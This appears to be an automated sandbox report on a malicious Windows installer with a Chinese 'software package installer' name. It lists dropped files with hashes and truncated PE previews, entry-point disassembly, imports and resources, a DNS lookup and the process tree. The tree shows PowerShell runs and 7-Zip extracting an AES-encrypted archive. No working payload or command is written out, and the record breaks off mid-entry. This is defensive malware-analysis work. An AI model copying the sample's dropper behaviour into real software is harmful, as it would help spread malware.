                        SHA-256:5FB9A89D21C3DD25609F2CA92B3944264226065CD8DC13736E9B316951FB9256
                        SHA-512:290931B408148D7B6D513A3CE91628827E8469BDE9CDFEC58499ED38AC0023A4AD11B7FD0068FDC91D683A87BBBA7338338582B0D5AAF7351BE155986035E3BC
                        Malicious:false
                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....fg...........!.....P..........E........................................ 7...........@.........................H#.......*..<.....6.X.....................6.d?..........................x.......................+...............................text....O.......P.................. ..`.rdata..<....`.......T..............@..@.data........`.......J..............@....00cfg.......@(.......(.............@..@.tls.........P(.......(.............@....voltbl.F....`(.......(..................j)q.....X...p(..Z....(............. ..`.rsrc...X.....6......j6.............@..@.reloc..d?....6..@...p6.............@..B................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):64
                        Entropy (8bit):1.1628158735648508
                        Encrypted:false
                        SSDEEP:3:NlllulLhwlz:NllUO
                        MD5:F442CD24937ABD508058EA44FD91378E
                        SHA1:FDE63CECA441AA1C5C9C401498F9032A23B38085
                        SHA-256:E2960AF08E2EE7C9C72EEA31DBBFE1B55B9BF84DE2DD7BB7204487E6AF37B8F6
                        SHA-512:927E2EEA0BB3FC3D3A0DA7F45644F594CE29F11D90A84B005D723500258DE9E8B3780EB87242F4C62B64B9FEEA1869FC16076FA3AC89EC34E0546CDE1BEF7631
                        Malicious:false
                        Preview:@...e................................................@..........
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):3366912
                        Entropy (8bit):6.530549308235048
                        Encrypted:false
                        SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                        MD5:CCFB5265302C0ED10D4EE3C9C00B07B1
                        SHA1:C89AAFB9E83EF08F32610D12C15840E3ADD3DD06
                        SHA-256:15B6D6F84E5D1A01AE0493EF947045BE2759BF942C603F89A5CD40E01C8894D0
                        SHA-512:0E0CE33F8A70E16753FFA8CB37D60998AB4E2D588E4C661C08568678615D473F6391B5E828B203C3DA5423FD71ABDFF322EDBAFF4273867F30C9A42E6523E99C
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                        Process:C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                        File Type:PE32+ executable (console) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):6144
                        Entropy (8bit):4.720366600008286
                        Encrypted:false
                        SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                        MD5:E4211D6D009757C078A9FAC7FF4F03D4
                        SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                        SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                        SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                        Malicious:false
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):3584000
                        Entropy (8bit):7.00283805408099
                        Encrypted:false
                        SSDEEP:49152:E7vv7WClWZ7sR4YW+AKb+JE/zEVa9BKRe71MzuiehWIKxZFh2GSTujbNMLC+z/gQ:E7H77lWrYW+X4Va9BKRe71MzSRi6yQ
                        MD5:4DB75814BF4A212D3AEBA5831C059402
                        SHA1:3674F7371C875A8E338C3374D5C5B58420944C55
                        SHA-256:5FB9A89D21C3DD25609F2CA92B3944264226065CD8DC13736E9B316951FB9256
                        SHA-512:290931B408148D7B6D513A3CE91628827E8469BDE9CDFEC58499ED38AC0023A4AD11B7FD0068FDC91D683A87BBBA7338338582B0D5AAF7351BE155986035E3BC
                        Malicious:false
                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....fg...........!.....P..........E........................................ 7...........@.........................H#.......*..<.....6.X.....................6.d?..........................x.......................+...............................text....O.......P.................. ..`.rdata..<....`.......T..............@..@.data........`.......J..............@....00cfg.......@(.......(.............@..@.tls.........P(.......(.............@....voltbl.F....`(.......(..................j)q.....X...p(..Z....(............. ..`.rsrc...X.....6......j6.............@..@.reloc..d?....6..@...p6.............@..B................................................................................................................................................................................................................................................................................
                        Process:C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):3366912
                        Entropy (8bit):6.530549308235048
                        Encrypted:false
                        SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                        MD5:CCFB5265302C0ED10D4EE3C9C00B07B1
                        SHA1:C89AAFB9E83EF08F32610D12C15840E3ADD3DD06
                        SHA-256:15B6D6F84E5D1A01AE0493EF947045BE2759BF942C603F89A5CD40E01C8894D0
                        SHA-512:0E0CE33F8A70E16753FFA8CB37D60998AB4E2D588E4C661C08568678615D473F6391B5E828B203C3DA5423FD71ABDFF322EDBAFF4273867F30C9A42E6523E99C
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                        Process:C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                        File Type:PE32+ executable (console) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):6144
                        Entropy (8bit):4.720366600008286
                        Encrypted:false
                        SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                        MD5:E4211D6D009757C078A9FAC7FF4F03D4
                        SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                        SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                        SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                        Malicious:false
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):3584000
                        Entropy (8bit):7.00283805408099
                        Encrypted:false
                        SSDEEP:49152:E7vv7WClWZ7sR4YW+AKb+JE/zEVa9BKRe71MzuiehWIKxZFh2GSTujbNMLC+z/gQ:E7H77lWrYW+X4Va9BKRe71MzSRi6yQ
                        MD5:4DB75814BF4A212D3AEBA5831C059402
                        SHA1:3674F7371C875A8E338C3374D5C5B58420944C55
                        SHA-256:5FB9A89D21C3DD25609F2CA92B3944264226065CD8DC13736E9B316951FB9256
                        SHA-512:290931B408148D7B6D513A3CE91628827E8469BDE9CDFEC58499ED38AC0023A4AD11B7FD0068FDC91D683A87BBBA7338338582B0D5AAF7351BE155986035E3BC
                        Malicious:false
                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....fg...........!.....P..........E........................................ 7...........@.........................H#.......*..<.....6.X.....................6.d?..........................x.......................+...............................text....O.......P.................. ..`.rdata..<....`.......T..............@..@.data........`.......J..............@....00cfg.......@(.......(.............@..@.tls.........P(.......(.............@....voltbl.F....`(.......(..................j)q.....X...p(..Z....(............. ..`.rsrc...X.....6......j6.............@..@.reloc..d?....6..@...p6.............@..B................................................................................................................................................................................................................................................................................
                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                        File Type:ASCII text, with CRLF, CR line terminators
                        Category:dropped
                        Size (bytes):406
                        Entropy (8bit):5.117520345541057
                        Encrypted:false
                        SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                        MD5:9200058492BCA8F9D88B4877F842C148
                        SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                        SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
                        SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                        Malicious:false
                        Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..
                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):7.920986760812326
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 98.04%
                        • Inno Setup installer (109748/4) 1.08%
                        • InstallShield setup (43055/19) 0.42%
                        • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
                        File name:#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
                        File size:5'694'753 bytes
                        MD5:44728e21199d2b04a4b25798625ac86e
                        SHA1:382e29a97bb8a34a3164f7464692f16e3526bb1c
                        SHA256:4cd9b5ec751ac76c5e71d500cd4592dbd4fc7ce4e88ea0187fbc04e66f976cc5
                        SHA512:cc8276fe2aa6e57ef9ade90f833dddcbf00b1edb952457c154666aa362fa915b4636d108e1738e420c2421456cc2f85f211eb2b350a0d6da8777f80a9009ee64
                        SSDEEP:98304:XwREBVV+Qh70jV13LgKYVR0jyaTnVWbaAzE0JVdMwZgW:lBCQ8j3LBYVavTIbaiE0JNF
                        TLSH:8D461222F2CBE43EE45D0B3B06B2A15894FB6A616522AD5786ECB4ECCF311501D3F647
                        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                        Icon Hash:0c0c2d33ceec80aa
                        Entrypoint:0x4a83bc
                        Entrypoint Section:.itext
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                        Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:6
                        OS Version Minor:1
                        File Version Major:6
                        File Version Minor:1
                        Subsystem Version Major:6
                        Subsystem Version Minor:1
                        Import Hash:40ab50289f7ef5fae60801f88d4541fc
                        Instruction
                        push ebp
                        mov ebp, esp
                        add esp, FFFFFFA4h
                        push ebx
                        push esi
                        push edi
                        xor eax, eax
                        mov dword ptr [ebp-3Ch], eax
                        mov dword ptr [ebp-40h], eax
                        mov dword ptr [ebp-5Ch], eax
                        mov dword ptr [ebp-30h], eax
                        mov dword ptr [ebp-38h], eax
                        mov dword ptr [ebp-34h], eax
                        mov dword ptr [ebp-2Ch], eax
                        mov dword ptr [ebp-28h], eax
                        mov dword ptr [ebp-14h], eax
                        mov eax, 004A2EBCh
                        call 00007F8F70D3DE35h
                        xor eax, eax
                        push ebp
                        push 004A8AC1h
                        push dword ptr fs:[eax]
                        mov dword ptr fs:[eax], esp
                        xor edx, edx
                        push ebp
                        push 004A8A7Bh
                        push dword ptr fs:[edx]
                        mov dword ptr fs:[edx], esp
                        mov eax, dword ptr [004B0634h]
                        call 00007F8F70DCF7BBh
                        call 00007F8F70DCF30Eh
                        lea edx, dword ptr [ebp-14h]
                        xor eax, eax
                        call 00007F8F70DC9FE8h
                        mov edx, dword ptr [ebp-14h]
                        mov eax, 004B41F4h
                        call 00007F8F70D37EE3h
                        push 00000002h
                        push 00000000h
                        push 00000001h
                        mov ecx, dword ptr [004B41F4h]
                        mov dl, 01h
                        mov eax, dword ptr [0049CD14h]
                        call 00007F8F70DCB313h
                        mov dword ptr [004B41F8h], eax
                        xor edx, edx
                        push ebp
                        push 004A8A27h
                        push dword ptr fs:[edx]
                        mov dword ptr fs:[edx], esp
                        call 00007F8F70DCF843h
                        mov dword ptr [004B4200h], eax
                        mov eax, dword ptr [004B4200h]
                        cmp dword ptr [eax+0Ch], 01h
                        jne 00007F8F70DD652Ah
                        mov eax, dword ptr [004B4200h]
                        mov edx, 00000028h
                        call 00007F8F70DCBC08h
                        mov edx, dword ptr [004B4200h]
                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0xb70000x71.edata
                        IMAGE_DIRECTORY_ENTRY_IMPORT0xb50000xfec.idata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xcb0000x11000.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xba0000x10fa8.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0xb90000x18.rdata
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0xb52d40x25c.idata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xb60000x1a4.didata
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000xa568c0xa5800b889d302f6fc48a904de33d8d947ae80False0.3620185045317221data6.377190161826806IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .itext0xa70000x1b640x1c00588dd0a8ab499300d3701cbd11b017d9False0.548828125data6.109264411030635IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .data0xa90000x38380x3a005c0c76e77aef52ebc6702430837ccb6eFalse0.35338092672413796data4.95916338709992IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .bss0xad0000x72580x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .idata0xb50000xfec0x1000627340dff539ef99048969aa4824fb2dFalse0.380615234375data5.020404933181373IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .didata0xb60000x1a40x200fd11c1109737963cc6cb7258063abfd6False0.34765625data2.729290535217263IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .edata0xb70000x710x2007de8ca0c7a61668a728fd3a88dc0942dFalse0.1796875data1.305578535725827IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .tls0xb80000x180x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rdata0xb90000x5d0x200d84006640084dc9f74a07c2ff9c7d656False0.189453125data1.3892750148744617IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc0xba0000x10fa80x11000a85fda2741bd9417695daa5fc5a9d7a5False0.5789579503676471data6.709466460182023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                        .rsrc0xcb0000x110000x1100020f7b0cee625907b1f43c38504803d33False0.18784466911764705data3.7212772086393158IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        NameRVASizeTypeLanguageCountryZLIB Complexity
                        RT_ICON0xcb6780xa68Device independent bitmap graphic, 64 x 128 x 4, image size 2048EnglishUnited States0.1174924924924925
                        RT_ICON0xcc0e00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.15792682926829268
                        RT_ICON0xcc7480x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.23387096774193547
                        RT_ICON0xcca300x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.39864864864864863
                        RT_ICON0xccb580x1628Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colorsEnglishUnited States0.08339210155148095
                        RT_ICON0xce1800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.1023454157782516
                        RT_ICON0xcf0280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.10649819494584838
                        RT_ICON0xcf8d00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.10838150289017341
                        RT_ICON0xcfe380x12e5PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8712011577424024
                        RT_ICON0xd11200x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.05668398677373642
                        RT_ICON0xd53480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.08475103734439834
                        RT_ICON0xd78f00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.09920262664165103
                        RT_ICON0xd89980x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.2047872340425532
                        RT_STRING0xd8e000x3f8data0.3198818897637795
                        RT_STRING0xd91f80x2dcdata0.36475409836065575
                        RT_STRING0xd94d40x430data0.40578358208955223
                        RT_STRING0xd99040x44cdata0.38636363636363635
                        RT_STRING0xd9d500x2d4data0.39226519337016574
                        RT_STRING0xda0240xb8data0.6467391304347826
                        RT_STRING0xda0dc0x9cdata0.6410256410256411
                        RT_STRING0xda1780x374data0.4230769230769231
                        RT_STRING0xda4ec0x398data0.3358695652173913
                        RT_STRING0xda8840x368data0.3795871559633027
                        RT_STRING0xdabec0x2a4data0.4275147928994083
                        RT_RCDATA0xdae900x10data1.5
                        RT_RCDATA0xdaea00x310data0.6173469387755102
                        RT_RCDATA0xdb1b00x2cdata1.1818181818181819
                        RT_GROUP_ICON0xdb1dc0xbcdataEnglishUnited States0.6170212765957447
                        RT_VERSION0xdb2980x584dataEnglishUnited States0.2790368271954674
                        RT_MANIFEST0xdb81c0x7a8XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3377551020408163
                        DLLImport
                        kernel32.dllGetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                        comctl32.dllInitCommonControls
                        user32.dllCreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                        oleaut32.dllSysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                        advapi32.dllConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey
                        NameOrdinalAddress
                        __dbk_fcall_wrapper20x40fc10
                        dbkFCallWrapperAddr10x4b063c
                        Language of compilation systemCountry where language is spokenMap
                        EnglishUnited States
                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Dec 22, 2024 09:45:24.388664007 CET1.1.1.1192.168.2.40x86b3No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                        Dec 22, 2024 09:45:24.388664007 CET1.1.1.1192.168.2.40x86b3No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false

                        Click to jump to process

                        Click to jump to process

                        Click to dive into process behavior distribution

                        Click to jump to process

                        Target ID:0
                        Start time:03:45:07
                        Start date:22/12/2024
                        Path:C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe"
                        Imagebase:0xca0000
                        File size:5'694'753 bytes
                        MD5 hash:44728E21199D2B04A4B25798625AC86E
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:Borland Delphi
                        Reputation:low
                        Has exited:true

                        Target ID:1
                        Start time:03:45:07
                        Start date:22/12/2024
                        Path:C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$20424,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe"
                        Imagebase:0xbe0000
                        File size:3'366'912 bytes
                        MD5 hash:CCFB5265302C0ED10D4EE3C9C00B07B1
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:Borland Delphi
                        Antivirus matches:
                        • Detection: 0%, ReversingLabs
                        Reputation:low
                        Has exited:true

                        Target ID:2
                        Start time:03:45:08
                        Start date:22/12/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
